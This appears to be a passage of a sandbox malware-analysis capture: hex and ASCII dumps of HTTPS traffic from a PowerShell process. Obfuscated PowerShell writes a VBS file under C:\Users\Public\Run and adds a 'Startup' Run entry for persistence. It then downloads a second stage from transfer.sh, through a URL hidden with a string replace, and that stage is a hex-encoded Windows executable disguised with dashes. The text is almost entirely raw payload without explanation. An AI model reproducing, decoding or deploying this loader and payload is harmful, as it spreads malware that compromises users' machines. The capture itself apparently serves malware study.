                        2021-09-14 14:17:24 UTC3INData Raw: 32 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 37 3a 2d 3a 35 34 3a 2d 3a 34 36 3a 2d 3a 35 39 3a 2d 3a 34 38 3a 2d 3a 34 36 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 33 38 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 34 37 3a 2d 3a 32 30 3a 2d 3a 33 64 3a 2d 3a 32 32 3a 2d 3a 34 33 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 32 64 3a 2d 3a 36 32 3a 2d 3a 36 63 3a 2d 3a 36 39 3a 2d 3a 36 33 3a 2d 3a 35 63 3a 2d 3a 35 32 3a 2d 3a 37 35 3a 2d 3a 36 65 3a 2d 3a 32 32 3a 2d 3a 32 65 3a 2d 3a 35 32 3a 2d 3a 36
                        Data Ascii: 2:-:46:-:59:-:48:-:47:-:54:-:46:-:59:-:48:-:46:-:48:-:55:-:59:-:47:-:59:-:55:-:38:-:59:-:55:-:59:-:59:-:55:-:59:-:47:-:20:-:3d:-:22:-:43:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:2d:-:62:-:6c:-:69:-:63:-:5c:-:52:-:75:-:6e:-:22:-:2e:-:52:-:6
                        2021-09-14 14:17:24 UTC4INData Raw: 3a 37 34 3a 2d 3a 36 38 3a 2d 3a 32 30 3a 2d 3a 32 34 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 61 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 35 35 3a 2d 3a 35 39 3a 2d 3a 35 35 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 34 38 3a 2d 3a 35 39 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 39 3a 2d 3a 35 35 3a 2d 3a 34 38 3a 2d 3a 34 39 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 34 65 3a 2d 3a 36 31 3a 2d 3a 36 64 3a 2d 3a 36 35 3a 2d 3a 32 30 3a 2d 3a 32 32 3a 2d 3a 35 33 3a 2d 3a 37 34 3a 2d 3a 36 31 3a 2d 3a 37 32 3a 2d 3a 37 34 3a 2d 3a 37 35 3a 2d 3a 37 30 3a 2d 3a 32 32 3a 2d 3a 32 30 3a 2d 3a 32 64 3a 2d 3a 35 36 3a 2d 3a 36 31 3a 2d 3a 36 63 3a 2d 3a 37 35 3a 2d 3a 36 35 3a 2d
                        Data Ascii: :74:-:68:-:20:-:24:-:48:-:49:-:55:-:48:-:49:-:55:-:48:-:4a:-:49:-:55:-:48:-:55:-:59:-:55:-:55:-:49:-:48:-:59:-:49:-:55:-:49:-:55:-:48:-:49:-:20:-:2d:-:4e:-:61:-:6d:-:65:-:20:-:22:-:53:-:74:-:61:-:72:-:74:-:75:-:70:-:22:-:20:-:2d:-:56:-:61:-:6c:-:75:-:65:-
                        2021-09-14 14:17:24 UTC8INData Raw: 74 20 48 20 3d 20 4e 6f 74 68 69 6e 67 0d 0a 27 40 0d 0a 53 65 74 2d 43 6f 6e 74 65 6e 74 20 2d 50 61 74 68 20 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 52 75 6e 5c 4e 65 77 2e 76 62 73 20 2d 56 61 6c 75 65 20 24 43 6f 6e 74 65 6e 74 0d 0a 0d 0a 73 74 61 72 74 2d 73 6c 65 65 70 20 2d 73 20 37 0d 0a 0d 0a 24 53 5a 58 44 43 46 56 47 42 48 4e 4a 53 44 46 47 48 20 3d 20 27 68 74 74 70 73 3a 2f 2f 74 72 61 6e 73 66 65 72 48 2d 48 73 68 2f 79 42 68 4a 4f 65 2f 62 62 68 79 75 48 2d 48 74 78 74 27 2e 52 65 70 6c 61 63 65 28 27 48 2d 48 27 2c 27 2e 27 29 3b 0d 0a 24 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 48 20 3d 20 22 32 34 3a 2d 3a 34 35 3a 2d 3a 34 34 3a 2d 3a 35 32 3a 2d 3a 34 36 3a 2d 3a 34 37 3a 2d 3a 34 38 3a 2d 3a 34 65 3a 2d 3a 34 61 3a
                        Data Ascii: t H = Nothing'@Set-Content -Path C:\Users\Public\Run\New.vbs -Value $Contentstart-sleep -s 7$SZXDCFVGBHNJSDFGH = 'https://transferH-Hsh/yBhJOe/bbhyuH-Htxt'.Replace('H-H','.');$HHHHHHHHHHHHHHHHHH = "24:-:45:-:44:-:52:-:46:-:47:-:48:-:4e:-:4a:


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.549756144.76.136.153443C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        TimestampkBytes transferredDirectionData
                        2021-09-14 14:17:55 UTC11OUTGET /yBhJOe/bbhyu.txt HTTP/1.1
                        Host: transfer.sh
                        2021-09-14 14:17:56 UTC11INHTTP/1.1 200 OK
                        Content-Disposition: attachment; filename="bbhyu.txt"
                        Content-Length: 512724
                        Content-Type: text/plain; charset=utf-8
                        Retry-After: Tue, 14 Sep 2021 16:17:59 GMT
                        Server: Transfer.sh HTTP Server 1.0
                        X-Made-With: <3 by DutchCoders
                        X-Ratelimit-Key: 84.17.52.51
                        X-Ratelimit-Limit: 10
                        X-Ratelimit-Rate: 600
                        X-Ratelimit-Remaining: 9
                        X-Ratelimit-Reset: 1631629079
                        X-Remaining-Days: n/a
                        X-Remaining-Downloads: n/a
                        X-Served-By: Proudly served by DutchCoders
                        Date: Tue, 14 Sep 2021 14:17:56 GMT
                        Connection: close
                        2021-09-14 14:17:56 UTC11INData Raw: 5b 53 74 72 69 6e 67 5d 24 48 48 3d 27 34 44 35 41 39 2d 2d 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 46 46 46 46 2d 2d 2d 2d 42 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 34 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 45 31 46 42 41 2d 45 2d 2d 42 34 2d 39 43 44 32 31 42 38 2d 31 34 43 43 44 32 31 35 34 36 38 36 39 37 33 32 2d 37 2d 37 32 36 46 36 37 37 32 36 31 36 44 32 2d 36 33 36 31 36 45 36 45 36 46 37 34 32 2d 36 32 36 35 32 2d 37 32 37 35 36 45 32 2d 36 39 36 45 32 2d 34 34 34 46 35 33 32 2d 36 44 36 46 36 34 36 35 32 45 2d 44 2d 44 2d 41 32 34
                        Data Ascii: [String]$HH='4D5A9----3-------4------FFFF----B8--------------4-----------------------------------------------------------------------8--------E1FBA-E--B4-9CD21B8-14CCD21546869732-7-726F6772616D2-63616E6E6F742-62652-72756E2-696E2-444F532-6D6F64652E-D-D-A24
                        2021-09-14 14:17:56 UTC12INData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 32 2d 2d 2d 2d 2d 34 38 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 45 37 34 36 35 37 38 37 34 2d 2d 2d 2d 2d 2d 39 38 43 37 2d 31 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 43 38 2d 31 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 36 2d 32 45 37 32 36 35 36 43 36 46 36 33 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 43 41 2d 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d
                        Data Ascii: -----------------------------------------------------2------8-----------------------82-----48----------------------2E74657874------98C7-1----2-------C8-1-----2----------------------------2-----6-2E72656C6F63-----C-----------2-----2------CA-1--------------
                        2021-09-14 14:17:56 UTC14INData Raw: 32 31 45 31 45 32 44 31 32 32 36 2d 33 31 42 31 36 32 43 2d 46 32 36 32 38 35 32 2d 2d 2d 2d 2d 41 32 38 35 33 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 45 46 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 43 2d 2d 2d 2d 31 31 2d 32 31 38 31 37 32 44 2d 37 32 36 32 38 35 34 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 31 33 33 2d 2d 31 2d 2d 2d 42 2d 2d 2d 2d 2d 2d 2d 44 2d 2d 2d 2d 31 31 44 2d 2d 35 2d 2d 2d 2d 2d 32 32 38 34 36 2d 2d 2d 2d 2d 41 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 45 2d 2d 2d 2d 31 31 2d 32 31 42 31 39 32 44 2d 37 32 36 32 38 35 35 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 46 37 2d 2d 2d 33 33 2d 2d 41 2d 2d 2d 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 41 31 37 32 44
                        Data Ascii: 21E1E2D1226-31B162C-F262852-----A2853-----A2A262BEC262BEF------133--3---F-------C----11-218172D-7262854-----A2A262BF7--133--1---B-------D----11D--5-----22846-----A2A--133--3---F-------E----11-21B192D-7262855-----A2A262BF7---33--A---F---------------21A172D
                        2021-09-14 14:17:56 UTC15INData Raw: 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 32 31 43 31 42 32 44 2d 41 32 36 38 43 2d 38 2d 2d 2d 2d 31 42 32 44 2d 42 32 42 2d 33 32 36 32 42 46 34 32 38 2d 34 2d 2d 2d 2d 32 42 32 41 2d 32 31 36 31 35 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 31 33 33 2d 2d 34 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 33 31 44 31 44 32 44 31 35 32 36 31 32 2d 2d 46 45 31 35 2d 38 2d 2d 2d 2d 31 42 2d 36 31 41 31 36 32 43 2d 41 32 36 38 31 2d 38 2d 2d 2d 2d 31 42 32 41 32 36 32 42 45 39 32 36 32 42 46 34 31 33 33 2d 2d 31 2d 2d 35 35 2d 2d 2d 2d 2d 2d 2d 46 2d 2d 2d 2d 31 31 2d 46 2d 2d 37 42 38 33 2d 2d 2d 2d 2d 34 34 35 2d 34 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 31 2d 2d 2d 2d 2d 2d 2d 31 45 2d 2d 2d 2d 2d 2d 32 43 2d 2d 2d 2d 2d 2d 32 42
                        Data Ascii: ------A----11-21C1B2D-A268C-8----1B2D-B2B-3262BF428-4----2B2A-216152D-2262A262BFC----133--4--2--------A----11-31D1D2D152612--FE15-8----1B-61A162C-A2681-8----1B2A262BE9262BF4133--1--55-------F----11-F--7B83-----445-4-------2------1-------1E------2C------2B
                        2021-09-14 14:17:56 UTC19INData Raw: 34 2d 33 31 37 31 35 32 44 2d 42 32 36 2d 34 36 46 36 42 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 42 32 36 32 42 46 33 2d 2d 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 41 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 36 31 38 32 44 2d 41 32 36 36 46 36 43 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 46 34 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 37 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 36 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 43 31 44
                        Data Ascii: 4-317152D-B26-46F6B-----A2A262BEB262BF3-------33--A--3----------------21C1E2D-A267B19-----42D-62B-3262BF42A-21A152D12267B19-----4-316182D-A266F6C-----A2A262BEC262BF4-33--A--3----------------2171E2D-A267B19-----42D-62B-3262BF42A-216152D12267B19-----4-31C1D
                        2021-09-14 14:17:56 UTC25INData Raw: 2d 2d 2d 2d 41 38 2d 33 32 2d 2d 2d 2d 2d 34 32 38 41 36 2d 2d 2d 2d 2d 41 32 38 41 37 2d 2d 2d 2d 2d 41 32 38 36 42 2d 2d 2d 2d 2d 36 32 44 31 43 32 42 31 35 38 2d 34 41 2d 2d 2d 2d 2d 34 32 42 43 41 38 2d 32 41 2d 2d 2d 2d 2d 34 32 42 43 43 38 2d 32 43 2d 2d 2d 2d 2d 34 32 42 43 45 32 38 36 46 2d 2d 2d 2d 2d 36 32 38 37 32 2d 2d 2d 2d 2d 36 32 38 37 33 2d 2d 2d 2d 2d 36 32 38 37 34 2d 2d 2d 2d 2d 36 32 38 36 2d 2d 2d 2d 2d 2d 36 32 38 36 39 2d 2d 2d 2d 2d 36 32 38 36 41 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 36 32 38 37 37 2d 2d 2d 2d 2d 36 32 38 37 41 2d 2d 2d 2d 2d 36 32 38 37 35 2d 2d 2d 2d 2d 36 32 38 37 36 2d 2d 2d 2d 2d 36 32 38 37 38 2d 2d 2d 2d 2d 36 32 38 37 39 2d 2d 2d 2d 2d 36 32 38 37 42 2d 2d 2d 2d 2d 36 32 38 37 43 2d 2d 2d 2d 2d 36
                        Data Ascii: ----A8-32-----428A6-----A28A7-----A286B-----62D1C2B158-4A-----42BCA8-2A-----42BCC8-2C-----42BCE286F-----62872-----62873-----62874-----6286------62869-----6286A-----62861-----62877-----6287A-----62875-----62876-----62878-----62879-----6287B-----6287C-----6
                        2021-09-14 14:17:56 UTC26INData Raw: 2d 2d 2d 2d 36 32 42 2d 33 2d 41 32 42 44 34 31 32 2d 31 32 38 39 38 2d 2d 2d 2d 2d 41 32 44 43 2d 44 45 2d 45 31 32 2d 31 46 45 31 36 31 32 2d 2d 2d 2d 31 42 36 46 36 33 2d 2d 2d 2d 2d 41 44 43 32 41 2d 41 2d 31 31 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 46 2d 2d 35 35 36 34 2d 2d 2d 45 2d 2d 2d 2d 2d 2d 2d 2d 31 42 33 2d 2d 33 2d 2d 32 41 2d 31 2d 2d 2d 2d 32 38 2d 2d 2d 2d 31 31 37 45 37 44 2d 2d 2d 2d 2d 34 32 2d 36 32 32 2d 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 41 38 2d 2d 2d 2d 2d 41 31 44 32 44 2d 42 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 44 2d 36 32 42 2d 33 2d 41 32 42 46 33 32 41 2d 36 32 38 41 46 2d 2d 2d 2d 2d 41 31 37 32 44 31 33 32 36 2d 37 32 38 32 42 2d 31 2d 2d 2d 36 31 38 32 44 2d 43 32 36 2d 38 31 33 2d 39 31 36 31 33 2d 38 32 42
                        Data Ascii: ----62B-3-A2BD412-12898-----A2DC-DE-E12-1FE1612----1B6F63-----ADC2A-A-11------2---F--5564---E--------1B3--3--2A-1----28----117E7D-----42-622-D-1E28FF-----628A8-----A1D2D-B26-628AE-----A2D-62B-3-A2BF32A-628AF-----A172D1326-7282B-1---6182D-C26-813-91613-82B
                        2021-09-14 14:17:56 UTC33INData Raw: 2d 2d 2d 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 35 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 33 43 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 32 38 35 37 2d 31 2d 2d 2d 36 31 38 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 2d 2d 33 45 32 38 33 44 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 31 37 32 38 38 36 2d 2d 2d 2d 2d 36 32 41 31 33 33 2d 2d 34 2d 2d 32 46 2d 31 2d 2d 2d 2d 33 37 2d 2d 2d 2d 31 31 32 38 33 39 2d 31 2d 2d 2d 36 33 39 32 34 2d 31 2d 2d 2d 2d 37 45 37 43 2d 2d 2d 2d 2d 34 32 44 2d 31 32 41 37 45 37 42 2d 2d 2d 2d 2d 34 32 44 2d 37 37 45 33 31 2d 2d 2d 2d 2d 34 32 42 2d 35 37 45 33 2d 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 37 45 37 42 2d 2d 2d 2d 2d 34 33 39 41 42 2d 2d 2d 2d 2d 2d 32 42 2d 33 2d 41 32 42 46 31 32 38 33 41 2d 31 2d 2d 2d 36
                        Data Ascii: ------33--9--15--------------283C-1---62D-12A2857-1---6182D-2262A262BFC------3E283D-1---62D-12A172886-----62A133--4--2F-1----37----112839-1---63924-1----7E7C-----42D-12A7E7B-----42D-77E31-----42B-57E3------41A2D-D267E7B-----439AB------2B-3-A2BF1283A-1---6
                        2021-09-14 14:17:56 UTC40INData Raw: 46 31 39 2d 31 2d 2d 2d 41 31 37 32 44 32 43 32 36 37 45 37 45 2d 2d 2d 2d 2d 34 2d 37 32 2d 39 31 32 36 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 45 39 2d 2d 2d 2d 2d 41 32 38 41 38 2d 2d 2d 2d 2d 41 31 38 32 44 31 31 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 43 2d 44 32 42 2d 39 2d 43 32 42 41 44 2d 42 32 42 44 32 2d 41 32 42 45 44 44 45 33 2d 37 45 37 45 2d 2d 2d 2d 2d 34 32 38 46 35 2d 2d 2d 2d 2d 41 32 36 2d 36 31 37 38 44 37 32 2d 2d 2d 2d 2d 31 2d 44 2d 39 31 36 2d 38 41 32 2d 39 32 38 32 41 2d 31 2d 2d 2d 36 32 38 42 38 2d 2d 2d 2d 2d 41 44 45 2d 43 32 38 34 43 2d 2d 2d 2d 2d 41 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 2d 33 2d 43 2d 31 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 39 38 39 2d 2d 2d 43 34 36 2d 2d 2d 2d 2d 31 31 33
                        Data Ascii: F19-1---A172D2C267E7E-----4-72-9126D-1E28FF-----628E9-----A28A8-----A182D1126-628AE-----A2C-D2B-9-C2BAD-B2BD2-A2BEDDE3-7E7E-----428F5-----A26-6178D72-----1-D-916-8A2-9282A-1---628B8-----ADE-C284C-----A2861-----ADE--2A-3-C-11-------------8989---C46-----113
                        2021-09-14 14:17:56 UTC47INData Raw: 33 2d 31 2d 2d 2d 41 38 2d 33 45 2d 2d 2d 2d 2d 34 32 41 2d 2d 31 33 33 2d 2d 36 2d 2d 31 41 2d 2d 2d 2d 2d 2d 35 36 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 37 2d 45 2d 34 32 38 32 43 2d 31 2d 2d 2d 36 31 35 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 31 42 2d 2d 2d 2d 2d 2d 35 37 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 45 2d 34 2d 45 2d 35 32 38 32 43 2d 31 2d 2d 2d 36 31 39 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 31 33 33 2d 2d 36 2d 2d 33 37 2d 2d 2d 2d 2d 2d 31 37 2d 2d 2d 2d 31 31 31 34 31 37 32 44 31 2d 32 36 37 45 33 39 2d 2d 2d 2d 2d 34 2d 32 36 46 37 32 2d 2d 2d 2d 2d 41 32 43 32 34 32 42 2d 33 2d 41 32 42 45 45 37 45 33 39
                        Data Ascii: 3-1---A8-3E-----42A--133--6--1A------56----11-3-4-5-7-E-4282C-1---6152D-926-2-66FA1-1---62A-A2BF5----133--6--1B------57----11-3-4-5-E-4-E-5282C-1---6192D-926-2-66FA1-1---62A-A2BF5--133--6--37------17----1114172D1-267E39-----4-26F72-----A2C242B-3-A2BEE7E39
                        2021-09-14 14:17:56 UTC55INData Raw: 2d 2d 2d 2d 36 32 38 46 36 2d 2d 2d 2d 2d 36 32 38 46 2d 2d 2d 2d 2d 2d 36 32 38 45 46 2d 2d 2d 2d 2d 36 36 31 32 38 45 45 2d 2d 2d 2d 2d 36 32 41 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 32 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 31 38 32 44 31 38 32 36 2d 33 31 35 31 45 32 44 31 35 32 36 32 2d 34 41 44 38 44 39 35 33 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 35 39 36 31 32 41 32 36 32 42 45 36 32 36 32 42 45 39 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 37 32 44 32 37 32 36 32 2d 38 44 46 43 42 33 34 45 36 36 36 35 36 36 36 35 36 36 36 36 36 35 36 35 36 36 35 39 2d 33 31 37 31 43 32 44 31 35 32 36 32 2d 45 46 44 37 46 35 43 31 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35
                        Data Ascii: ----628F6-----628F------628EF-----66128EE-----62A-----33--A--23---------------218182D1826-3151E2D15262-4AD8D95366666565666665666559612A262BE6262BE9---33--A--32---------------21C172D27262-8DFCB34E66656665666665656659-3171C2D15262-EFD7F5C1666665656666656665
                        2021-09-14 14:17:56 UTC62INData Raw: 32 37 42 36 33 2d 2d 2d 2d 2d 34 2d 36 2d 33 2d 36 35 39 36 46 35 43 2d 31 2d 2d 2d 41 2d 42 2d 37 32 44 2d 36 2d 32 32 38 2d 34 2d 31 2d 2d 2d 36 2d 36 2d 37 35 38 2d 41 2d 36 2d 33 33 32 44 39 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 33 35 2d 2d 2d 2d 2d 2d 36 46 2d 2d 2d 2d 31 31 2d 32 37 42 36 32 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 2d 32 31 34 31 36 32 43 2d 41 32 36 32 36 2d 36 32 43 31 32 32 42 2d 41 2d 41 32 42 46 31 37 44 36 32 2d 2d 2d 2d 2d 34 32 42 46 31 2d 36 36 46 37 39 2d 2d 2d 2d 2d 41 2d 32 31 34 31 44 32 44 2d 33 32 36 32 36 32 41 37 44 36 33 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 36 35 2d 2d 2d 2d 2d 2d 37 2d 2d 2d 2d 2d 31 31 2d 33 31 36 32 46 2d 36 37 33 35 44 2d 31 2d 2d 2d 41 37 41 2d 33 38 44 32 32
                        Data Ascii: 27B63-----4-6-3-6596F5C-1---A-B-72D-6-228-4-1---6-6-758-A-6-332D92A--133--3--35------6F----11-27B62-----41A2D-D26-214162C-A2626-62C122B-A-A2BF17D62-----42BF1-66F79-----A-2141D2D-326262A7D63-----42BF8------133--6--65------7-----11-3162F-6735D-1---A7A-38D22
                        2021-09-14 14:17:56 UTC69INData Raw: 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 44 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 44 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 45 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 45 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 43 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 46 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 33 32 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 2d 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 31 46 2d 2d 2d 2d 31 42 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 31 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 34 38 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d
                        Data Ascii: F6D-1---A7E76-----4D-BD-----12846-----A1F-D6F6D-1---A7E76-----4D-BE-----12846-----A1F-E6F6D-1---A7E76-----4D-BC-----12846-----A1F-F6F6D-1---A7E76-----4D-32-----12846-----A1F1-6F6D-1---A7E76-----4D-1F----1B2846-----A1F116F6D-1---A7E76-----4D-48-----12846--
                        2021-09-14 14:17:56 UTC76INData Raw: 33 2d 37 2d 33 37 42 31 35 2d 2d 2d 2d 2d 34 31 31 2d 37 32 2d 39 39 32 43 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 42 33 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 36 46 39 37 34 31 31 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 32 36 2d 2d 2d 2d 2d 2d 34 36 2d 2d 2d 2d 2d 31 31 33 33 2d 2d 34 2d 2d 35 33 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 31 31 31 36 37 45 33 41 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 41 31 37 35 39 31 39 32 44 2d 37 32 36 31 41 32 44 2d 36 32 36 32 42 33 36 2d 43 32 42 46 37 2d 42 32 42 46 38 37 45 33 41 2d 2d 2d 2d 2d 34 2d 37 36 46 41 45 2d 31 2d 2d 2d 41 37 42 31 31 2d 2d 2d 2d 2d 34 2d 32 32 38 36 2d 2d 31 2d 2d 2d 41 32 43 2d 43
                        Data Ascii: 3-7-37B15-----411-72-992CD-1E28FF-----628B3-----62861-----ADE--2A6F97411C--------------------3B-2----3B-2----26------46-----1133--4--53------8-----11167E3A-----46FAD-1---A1759192D-7261A2D-6262B36-C2BF7-B2BF87E3A-----4-76FAE-1---A7B11-----4-2286--1---A2C-C
                        2021-09-14 14:17:56 UTC84INData Raw: 34 33 46 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 35 2d 2d 2d 2d 2d 34 2d 33 32 38 38 36 2d 2d 2d 2d 2d 41 37 34 33 46 2d 2d 2d 2d 2d 32 31 41 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 38 35 2d 2d 2d 2d 2d 41 37 34 33 43 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 36 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 